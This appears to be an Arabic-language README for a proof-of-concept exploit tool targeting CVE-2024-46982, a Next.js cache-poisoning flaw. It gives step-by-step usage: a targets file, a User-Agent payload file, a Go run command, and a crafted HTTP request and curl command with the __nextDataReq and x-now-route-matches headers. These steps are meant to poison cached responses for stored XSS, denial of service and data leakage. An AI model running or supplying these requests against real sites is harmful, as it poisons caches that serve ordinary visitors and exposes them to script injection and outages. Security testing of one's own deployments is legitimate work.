
إثبات المفهوم CVE-2024-46982
تعمل هذه الأداة على أتمتة اكتشاف واستغلال CVE-2024-46982، وهي ثغرة تسميم ذاكرة التخزين المؤقت في Next.js، حيث يمكن تخزين استجابات التقديم من جانب الخادم (SSR) مؤقتًا بشكل غير صحيح كاستجابات توليد المواقع الثابتة (SSG). قد يؤدي هذا التكوين الخاطئ إلى XSS المخزنة، وحجب الخدمة (DoS)، وتسريب البيانات، مما يسمح للمهاجمين بحقن محتوى ضار في الاستجابات المخزنة مؤقتًا.
أنشئ ملفًا باسم targets.txt يحتوي على عنوان URL هدف واحد في كل سطر:
https://vulnerable-site.com
https://another-target.com
أنشئ ملفًا باسم payloads.txt يحتوي على حمولات سيتم حقنها عبر ترويسة User-Agent:
قم بتجميع الاستغلال وتنفيذه باستخدام:
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
أرسل طلبًا ضارًا باستخدام curl:
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
قم بزيارة نقطة النهاية في المتصفح